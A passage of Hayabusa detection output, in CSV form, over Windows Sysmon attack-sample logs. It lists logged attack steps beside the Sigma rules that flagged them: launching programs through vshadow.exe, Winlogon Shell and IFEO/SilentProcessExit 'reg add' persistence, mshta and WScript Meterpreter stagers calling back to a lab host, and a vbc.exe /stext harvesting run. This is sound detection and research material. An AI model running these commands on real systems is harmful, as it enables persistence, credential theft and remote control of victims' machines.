""6350c17eb"" ""00000000"" ""000005AC"" ""00000590"" | Process: C:\Windows\System32\drvinst.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x3e7 | PID: 1968 | PGUID: 365ABB72-9960-5CEC-0000-001082AD1600 | Hash: SHA1=2D42A8EABA2829A1641FC580DA5E337C75997A99,MD5=44DAF0A410AB80E7CAB7C12EDE5FFB34,SHA256=3493630EE740508D0DB760A7648470F2987752D9B205CCCA805A66C3524E2B58,IMPHASH=ED4425CF217058DA6BDF611263E571DD",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx +2019-05-28 02:13:53.507 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: IEWIN7\IEUser | Parent Cmd: utilman.exe /debug | LID: 0x14a73 | PID: 2600 | PGUID: 365ABB72-9961-5CEC-0000-0010E1161700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx +2019-05-28 02:14:48.819 +00:00,IEWIN7,1,info,,Process Created,"Cmd: vshadow.exe -nw -exec=c:\windows\System32\notepad.exe c:\ | Process: C:\ProgramData\vshadow.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x14a73 | PID: 3092 | PGUID: 365ABB72-9998-5CEC-0000-00107D501700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx +2019-05-28 02:14:49.194 +00:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"Process Launched via DCOM | Cmd: DrvInst.exe ""1"" ""200"" ""STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot12"" """" """" ""6d110b0a3"" ""00000000"" ""000005B8"" ""000004B0"" | Process: C:\Windows\System32\drvinst.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x3e7 | PID: 1128 | PGUID: 365ABB72-9999-5CEC-0000-0010EB5A1700 | Hash: SHA1=2D42A8EABA2829A1641FC580DA5E337C75997A99,MD5=44DAF0A410AB80E7CAB7C12EDE5FFB34,SHA256=3493630EE740508D0DB760A7648470F2987752D9B205CCCA805A66C3524E2B58,IMPHASH=ED4425CF217058DA6BDF611263E571DD",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx +2019-05-28 02:14:50.413 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""c:\windows\System32\notepad.exe"" | Process: C:\Windows\System32\notepad.exe | User: IEWIN7\IEUser | Parent Cmd: vshadow.exe -nw -exec=c:\windows\System32\notepad.exe c:\ | LID: 0x14a73 | PID: 1516 | PGUID: 365ABB72-999A-5CEC-0000-0010C3A11700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx +2019-05-28 23:09:38.589 +00:00,IEWIN7,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - Startup User Shell Folder Modified | SetValue: HKU\S-1-5-21-3583694148-1414552638-2922671848-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\startup: c:\programdata\StartupNewHomeAddress | Process: C:\Windows\system32\reg.exe | PID: 1520 | PGUID: 365ABB72-BFB2-5CED-0000-0010F2C03600,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_startup_UserShellStartup_Folder_Changed_sysmon_13.evtx +2019-06-14 22:22:17.988 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\Downloads\a.exe"" | Process: C:\Users\IEUser\Downloads\a.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x1336d | PID: 4020 | PGUID: 365ABB72-1E19-5D04-0000-0010DFC60A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-14 22:22:21.503 +00:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe | Process: C:\Users\IEUser\Downloads\a.exe | PID: 4020 | PGUID: 365ABB72-1E19-5D04-0000-0010DFC60A00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-14 22:22:21.503 +00:00,IEWIN7,11,low,ResDev,Creation of an Executable by an Executable,,rules/sigma/file_event/file_event_win_susp_dropper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-14 22:22:21.535 +00:00,IEWIN7,13,medium,,Registry Key Value Set_Sysmon Alert,"Persistence - Winlogon Shell | SetValue: HKU\S-1-5-21-3583694148-1414552638-2922671848-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe"",explorer.exe | Process: C:\Users\IEUser\Downloads\a.exe | PID: 4020 | PGUID: 365ABB72-1E19-5D04-0000-0010DFC60A00",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-14 22:22:21.535 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\Downloads\a.exe"" | Process: C:\Users\IEUser\Downloads\a.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Users\IEUser\Downloads\a.exe"" | LID: 0x1336d | PID: 1008 | PGUID: 365ABB72-1E1D-5D04-0000-001003E70A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-14 22:22:21.535 +00:00,IEWIN7,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_sysmon/registry_set/registry_set_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-14 22:22:31.957 +00:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Execution - Suspicious WMI module load | Image: C:\Windows\System32\wbem\wmiutils.dll | Process: C:\Users\IEUser\Downloads\a.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1008 | PGUID: 365ABB72-1E1D-5D04-0000-001003E70A00 | Hash: SHA1=03DC8ABDF9C9948FE6E783DCA9C6C8264D635F0A,MD5=5610B0425518D185331CB8E968D060E6,SHA256=E235186C3BF266EE9EC733D2CFF35E3A65DE039C19B14260F4054F34B5E8AD41,IMPHASH=523D1DB34FC36465E35F6201A2FD561B",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-14 22:22:31.957 +00:00,IEWIN7,7,info,Exec,WMI Modules Loaded,,rules/sigma/image_load/image_load_wmi_module_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-14 22:22:32.222 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"" /stext ""C:\Users\IEUser\AppData\Local\Temp\tmpA185.tmp"" | Process: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Users\IEUser\Downloads\a.exe"" | LID: 0x1336d | PID: 1584 | PGUID: 365ABB72-1E28-5D04-0000-0010EC030B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-14 22:22:47.253 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x0 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 1552 | PGUID: 365ABB72-1E37-5D04-0000-001049360B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-14 22:22:52.457 +00:00,IEWIN7,5,info,,Process Terminated,Process: C:\Users\IEUser\Downloads\a.exe | PID: 1008 | PGUID: 365ABB72-1E1D-5D04-0000-001003E70A00,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-14 22:22:52.503 +00:00,IEWIN7,5,info,,Process Terminated,Process: C:\Users\IEUser\Downloads\a.exe | PID: 4020 | PGUID: 365ABB72-1E19-5D04-0000-0010DFC60A00,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-14 22:22:55.441 +00:00,IEWIN7,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 00000000 00000040 | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 688 | PGUID: 365ABB72-1E3F-5D04-0000-0010EC890B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-14 22:22:55.503 +00:00,IEWIN7,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 00000040 | LID: 0x3e7 | PID: 488 | PGUID: 365ABB72-1E3F-5D04-0000-0010568A0B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-14 22:22:55.566 +00:00,IEWIN7,1,info,,Process Created,Cmd: winlogon.exe | Process: C:\Windows\System32\winlogon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 00000040 | LID: 0x3e7 | PID: 1228 | PGUID: 365ABB72-1E3F-5D04-0000-0010FF8D0B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-14 22:22:55.707 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x0 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 948 | PGUID: 365ABB72-1E3F-5D04-0000-00102B9C0B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-14 22:23:06.691 +00:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Process: C:\Windows\System32\dllhost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x3e7 | PID: 2128 | PGUID: 365ABB72-1E4A-5D04-0000-0010ECC20B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-14 22:23:07.019 +00:00,IEWIN7,1,info,,Process Created,Cmd: efsui.exe /efs /keybackup | Process: C:\Windows\System32\efsui.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\lsass.exe | LID: 0xbc013 | PID: 2264 | PGUID: 365ABB72-1E4A-5D04-0000-0010BACF0B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-14 22:23:07.082 +00:00,IEWIN7,1,info,,Process Created,Cmd: atbroker.exe | Process: C:\Windows\System32\AtBroker.exe | User: IEWIN7\IEUser | Parent Cmd: winlogon.exe | LID: 0xbc013 | PID: 1628 | PGUID: 365ABB72-1E4A-5D04-0000-001016D70B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-14 22:23:13.894 +00:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\userinit.exe | Process: C:\Windows\System32\userinit.exe | User: IEWIN7\IEUser | Parent Cmd: winlogon.exe | LID: 0xbc013 | PID: 3448 | PGUID: 365ABB72-1E51-5D04-0000-00104C340C00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-14 22:23:13.957 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe"" | Process: C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\userinit.exe | LID: 0xbc013 | PID: 3444 | PGUID: 365ABB72-1E51-5D04-0000-00107B380C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-14 22:23:13.957 +00:00,IEWIN7,1,medium,Evas,Suspicious Userinit Child Process,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_userinit_child.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-14 22:23:13.957 +00:00,IEWIN7,1,high,Persis,Logon Scripts (UserInitMprLogonScript),,rules/sigma/process_creation_sysmon/proc_creation_win_logon_scripts_userinitmprlogonscript_proc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-14 22:23:13.972 +00:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\Explorer.EXE | Process: C:\Windows\explorer.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\userinit.exe | LID: 0xbc013 | PID: 3620 | PGUID: 365ABB72-1E51-5D04-0000-001065390C00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-14 22:23:15.054 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\VBoxTray.exe"" | Process: C:\Windows\System32\VBoxTray.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0xbc013 | PID: 3920 | PGUID: 365ABB72-1E52-5D04-0000-00101D700C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-14 22:23:16.592 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe"" | Process: C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe"" | LID: 0xbc013 | PID: 1724 | PGUID: 365ABB72-1E54-5D04-0000-0010B7B30C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-14 22:23:23.405 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\eventvwr.exe"" | Process: C:\Windows\System32\eventvwr.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0xbc013 | PID: 2040 | PGUID: 365ABB72-1E5B-5D04-0000-00109EF80C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-14 22:23:26.811 +00:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Execution - Suspicious WMI module load | Image: C:\Windows\System32\wbem\wmiutils.dll | Process: C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1724 | PGUID: 365ABB72-1E54-5D04-0000-0010B7B30C00 | Hash: SHA1=03DC8ABDF9C9948FE6E783DCA9C6C8264D635F0A,MD5=5610B0425518D185331CB8E968D060E6,SHA256=E235186C3BF266EE9EC733D2CFF35E3A65DE039C19B14260F4054F34B5E8AD41,IMPHASH=523D1DB34FC36465E35F6201A2FD561B",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-14 22:23:26.811 +00:00,IEWIN7,7,info,Exec,WMI Modules Loaded,,rules/sigma/image_load/image_load_wmi_module_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-14 22:23:26.999 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"" /stext ""C:\Users\IEUser\AppData\Local\Temp\tmp7792.tmp"" | Process: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe"" | LID: 0xbc013 | PID: 2980 | PGUID: 365ABB72-1E5E-5D04-0000-0010EF5E0D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-14 22:23:53.358 +00:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Process: C:\Windows\System32\dllhost.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0xbc013 | PID: 3284 | PGUID: 365ABB72-1E79-5D04-0000-0010EADE0E00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:13:42.294 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\mshta.exe"" ""C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\update.hta"" | Process: C:\Windows\System32\mshta.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Internet Explorer\iexplore.exe"" C:\Users\IEUser\Downloads\update.html | LID: 0x135a4 | PID: 652 | PGUID: 365ABB72-9AA6-5D04-0000-00109C850F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx +2019-06-15 07:13:42.294 +00:00,IEWIN7,1,high,Exec,Suspicious MSHTA Process Patterns,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx +2019-06-15 07:13:42.294 +00:00,IEWIN7,1,high,Evas | Exec,MSHTA Suspicious Execution 01,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx +2019-06-15 07:13:42.294 +00:00,IEWIN7,1,high,Exec,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx +2019-06-15 07:13:44.106 +00:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.13:49159 (IEWIN7) | Dst: 10.0.2.18:4443 () | User: IEWIN7\IEUser | Process: C:\Windows\System32\mshta.exe | PID: 652 | PGUID: 365ABB72-9AA6-5D04-0000-00109C850F00,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx +2019-06-15 07:14:32.809 +00:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Process: C:\Windows\System32\dllhost.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x135a4 | PID: 3892 | PGUID: 365ABB72-9AD8-5D04-0000-0010C08C1000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx +2019-06-15 07:21:50.488 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Program Files\Internet Explorer\iexplore.exe"" C:\Users\IEUser\Downloads\updatevbs.html | Process: C:\Program Files\Internet Explorer\iexplore.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x135a4 | PID: 540 | PGUID: 365ABB72-9C8E-5D04-0000-0010D0421600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx +2019-06-15 07:21:51.035 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Program Files\Internet Explorer\iexplore.exe"" SCODEF:540 CREDAT:275457 /prefetch:2 | Process: C:\Program Files\Internet Explorer\iexplore.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Internet Explorer\iexplore.exe"" C:\Users\IEUser\Downloads\updatevbs.html | LID: 0x135a4 | PID: 984 | PGUID: 365ABB72-9C8E-5D04-0000-001080561600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx +2019-06-15 07:22:05.691 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\WScript.exe"" ""C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\updatevbs.vbs"" | Process: C:\Windows\System32\wscript.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Internet Explorer\iexplore.exe"" C:\Users\IEUser\Downloads\updatevbs.html | LID: 0x135a4 | PID: 172 | PGUID: 365ABB72-9C9D-5D04-0000-001039CE1600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx +2019-06-15 07:22:05.691 +00:00,IEWIN7,1,high,Exec,WScript or CScript Dropper,,rules/sigma/process_creation_sysmon/proc_creation_win_malware_script_dropper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx +2019-06-15 07:22:05.691 +00:00,IEWIN7,1,high,Exec,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx +2019-06-15 07:22:05.973 +00:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Execution - Suspicious Microsoft.XMLDOM module load | Image: C:\Windows\System32\msxml3.dll | Process: C:\Windows\System32\wscript.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 172 | PGUID: 365ABB72-9C9D-5D04-0000-001039CE1600 | Hash: SHA1=F4F7354475114E39447975211F5D0A5FA8DB8367,MD5=77B25423AD769057258786540205F6C8,SHA256=20B2A5B34D764D92028CF5EAB46A91F2F7F1A0ECC3FEBA4FC3CDF881AB3A136C,IMPHASH=EF7BEA73AB4F834F0C44DDE0150B5648",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx +2019-06-15 07:22:08.473 +00:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.13:49162 (IEWIN7) | Dst: 10.0.2.18:4443 () | User: IEWIN7\IEUser | Process: C:\Windows\System32\wscript.exe | PID: 172 | PGUID: 365ABB72-9C9D-5D04-0000-001039CE1600,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx +2019-06-19 17:22:37.897 +00:00,IEWIN7,1,info,,Process Created,"Cmd: reg add ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe"" /v GlobalFlag /t REG_DWORD /d 512 | Process: C:\Windows\System32\reg.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x134a4 | PID: 1356 | PGUID: 365ABB72-6F5D-5D0A-0000-00109B331300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-19 17:22:41.709 +00:00,IEWIN7,1,info,,Process Created,"Cmd: reg add ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe"" /v ReportingMode /t REG_DWORD /d 1 | Process: C:\Windows\System32\reg.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x134a4 | PID: 2504 | PGUID: 365ABB72-6F61-5D0A-0000-0010DB351300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-19 17:22:41.709 +00:00,IEWIN7,13,critical,PrivEsc | Persis | Evas,GlobalFlags Registry Persistence Mechanisms,,rules/sigma/registry_sysmon/registry_set/registry_set_globalflags_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-19 17:22:41.709 +00:00,IEWIN7,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_sysmon/registry_set/registry_set_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-19 17:22:43.944 +00:00,IEWIN7,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence via 